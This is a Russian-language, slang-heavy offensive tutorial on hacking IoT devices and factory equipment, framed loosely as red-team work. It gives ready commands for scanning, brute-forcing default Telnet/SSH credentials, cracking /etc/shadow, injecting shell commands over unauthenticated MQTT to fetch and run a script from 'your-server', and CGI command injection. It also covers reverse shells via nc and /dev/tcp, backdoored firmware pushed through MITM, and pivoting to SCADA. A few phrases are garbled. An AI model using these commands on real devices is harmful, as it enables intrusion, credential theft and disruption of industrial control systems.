Пентест IoT: Ломаем умные хомячки и заводскую дичь

Эй, братан, садись ближе к терминалу, сейчас будем ломать IoT-шнягу: от умных хомячков до заводских коробок, которые думают, что они в безопасности. Мы с тобой в подвале, запах кофе и старого железа, а на экране — прошивки, MQTT и дефолтные пароли, которые просят, чтоб их сломали. Давай по классике: точка входа, что вижу, куда лезу. Погнали!

1. Точка входа: Что за зверь перед нами?

IoT-девайсы — это обычно дешёвое железо с прошивкой на коленке. Умные розетки, камеры, датчики на заводах — всё на одном уровне: дыры в веб-интерфейсах, дефолтные пароли и протоколы без шифрования. Первое, что бросается в глаза:

• Девайс орёт свои порты через nmap.
• MQTT-брокеры без авторизации.
• Telnet/SSH с логином admin:admin или root:12345.

Команда на старт: nmap -sV -p- 192.168.1.0/24 — ищем, кто живой. Если IoT-шняга пингуется, сразу смотрим 23 (Telnet), 22 (SSH), 80/443 (веб-мордочка) и 1883 (MQTT). Вижу открытый 1883? Уже пахнет бедой.

Офенсив-анализ: 90% IoT-девайсов на заводе или в смарт-доме не обновлялись с момента покупки. Прошивка 2017 года, пароли дефолтные, а защита — это наклейка “не ломать”. Лезем дальше.

2. Вектор 1: Telnet/SSH — Дефолтные пароли как билет внутрь

Что вижу: Половина устройств на Telnet/SSH пускают с заводскими кредами. Базы паролей типа admin:admin, root:root, user:1234 — наш хлеб. Если девайс старый, ищи в мануале или на сайте производителя “default credentials”.

Как ломаем:

1. Сканируем: nmap -p 23,22 192.168.1.1-254
2. Если открыт, брутим: hydra -L users.txt -P pass.txt -t 4 ssh://192.168.1.100 (или telnet, меняй протокол).
3. Файлы для брута: качай с SecLists или гугли [device_name] default password.

Трюк: Если SSH пускает, сразу проверяй /etc/passwd и /etc/shadow. Часто там хранятся пароли в открытом виде или слабом хэше. cat /etc/shadow и дальше через john или hashcat рвём на куски.

Офенсив-анализ: Забавно, но в 2025 году до сих’telnet ещё жив. Производители IoT экономят на всём, даже на базовой защите. Если попал внутрь, ищи конфиги веб-сервера или MQTT-клиента. Это мостик к RCE.

3. Вектор 2: MQTT — Болтливый протокол для шпионажа и команд

Что вижу: MQTT (Message Queuing Telemetry Transport) — это сердце умных девайсов. Датчики, розетки, камеры — всё болтает через брокера на порту 1883. И, сюрприз, авторизация часто отключена.

Как ломаем:

1. Сканируем: nmap -p 1883 192.168.1.1-254
2. Подключаемся через клиент, типа mosquitto_sub:
   mosquitto_sub -h 192.168.1.100 -t "#"
   (Слушаем все топики, # — wildcard, ловишь всё, что девайс орёт).
3. Если топики пишут команды (типа /device/cmd), шлём свой пейлоад:
   mosquitto_pub -h 192.168.1.100 -t "/device/cmd" -m "reboot;wget http://your-server/malicious.sh;sh malicious.sh"

Трюк: Многие IoT-шняги парсят команды из MQTT без валидации. Пихай туда шелл-команды, SQL-инъекции или просто спамь, пока не упадёт.

Офенсив-анализ: MQTT без шифрования и авторизации — это как оставленная записка с паролем на роутере. Ловишь данные (логины, пароли, телеметрию), а потом пихаешь команды. Если брокер на заводе, можно вообще остановить конвейер через один pub.

4. Вектор 3: Прошивка — Раскачка и Reverse Engineering

Что вижу: Прошивка — это душа девайса. Если скачать firmware с сайта производителя (или вытащить через физический доступ), можно найти кучу вкусного: хардкодные пароли, ключи API, уязвимые бинарники.

Как ломаем:

1. Достаём прошивку: Если есть веб-интерфейс, ищи URL типа /firmware или /backup. Или подключись к девайсу через UART (нужны паяльник и чуть терпения).
2. Распаковываем: Используй binwalk:
   binwalk -e firmware.bin
   Это разложит образ на части: файловую систему, скрипты, бинарники.
3. Ищем дыры: Смотри /etc/passwd, конфиги, скрипты на наличие хардкодных кредами.
   Пример: grep -r "password" extracted/ — ищи всё, что пахнет секретами.
4. RCE-цепочка: Если в прошивке есть веб-сервер или CGI-скрипты, проверяй на инъекции. Пример: в httpd часто есть параметры, которые парсятся без фильтрации. Пейлоад типа http://192.168.1.100/cgi-bin/test.cgi?cmd=;id может дать тебе шелл.

Трюк: Если в прошивке старый busybox или утилиты, ищи известные CVE. Например, BusyBox 1.29.3 уязвим к RCE через udhcpd (CVE-2018-20679). Эксплойт качай с Exploit-DB, адаптируй под девайс.

Офенсив-анализ: Прошивки — это кладезь. Производители IoT не заморачиваются с обновлениями, так что дыры из 2015 года до сих’t живы. Binwalk тебе покажет, где копать, а дальше — дело техники. Главное, не убей девайс, пока течешь.

5. Итоговый вектор: Цепочки RCE и контроль

Что вижу: IoT-девайсы — это не просто игрушка, а мостик в сеть. Попал в один? Ищи, куда он подключён: роутер, сервер, другие девайсы.

Как ломаем:

1. Если есть доступ через SSH/Telnet, подними реверс-шелл:
   nc -e /bin/sh your-server 4444 (или используй bash -i >& /dev/tcp/your-server/4444 0>&1).
2. Если через MQTT, пихай команды на скачивание малвари:
   mosquitto_pub -h 192.168.1.100 -t "/device/cmd" -m "wget http://your-server/shell.sh;chmod +x shell.sh;./shell.sh"
3. Если через прошивку, модифицируй её, добавь свой бэкдор и залей обратно (если есть доступ к обновлению firmware через веб).

Офенсив-анализ: Цель — не просто сломать хомячка, а закрепиться. IoT часто в одной сети с чем-то жирным: SCADA-системы на заводах, домашние сервера. Взял девайс? Прыгай дальше, пивотинг — наше всё.

Советы

1. Проверь другие протоколы: CoAP, Zigbee, Z-Wave — там тоже дыры, особенно если есть физический доступ. Используй SDR (Software Defined Radio) для перехвата.
2. Ищи API-эндпоинты в веб-интерфейсе девайса. Часто REST API без авторизации даёт доступ к командам (/api/v1/exec?cmd=...).
3. Если прошивка обновляется по HTTP, подмени трафик через MITM и залей свою версию с бэкдором (арп-спуфинг через ettercap в помощь).
4. Смотри на облачные сервисы, к которым девайс подключён. Часто токены для авторизации хардкодятся в прошивке или трафике (ловим через tcpdump).
5. Если всё сломано и закрепился — пиши отчёт, брат. Red Team не просто ломает, а показывает, как чинить. Но это уже после пива.